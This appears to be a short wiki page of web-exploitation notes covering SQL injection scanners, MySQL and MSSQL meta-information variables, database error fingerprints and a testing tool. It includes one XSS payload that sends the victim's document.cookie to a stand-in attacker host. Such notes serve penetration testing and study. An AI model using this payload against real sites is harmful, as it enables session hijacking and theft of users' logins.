kb:web:home

General Stuff

Most web exploiting should be done in OWASP Mantra . This browser is a derivative of Firefox that has lots of tools, plugins and addons integrated (with everything sanitized) to facilitate vulnerability finding.

SQLi

Scanners:

mieliekoek.pl (error)
sqlmap (blind / union )
w3af (error / blind)

Meta-information variables:

@@datadir (MySQL)
@@version (MySQL /MS SQL)
user() (MySQL)
database() (MySQL)

Cheat sheet

XSS cookie stealing payload

  <script>
  function hack(){
     XSSImage=new Image;
     XSSImage.src="http://attacker's site.com/steal?stuff=" + document.cookie + "";
  }
  hack();
  </script>

Database error fingerprints:
- “ORA-01756: quoted string not properly terminated” → Oracle
- “Incorrect Syntax near ” → MSSQL
- “You have an error in your SQL syntax” → MySQL
- Hex error code → PostgreSQL

Test setup

Use http://sqlfiddle.com to build schemas and test queries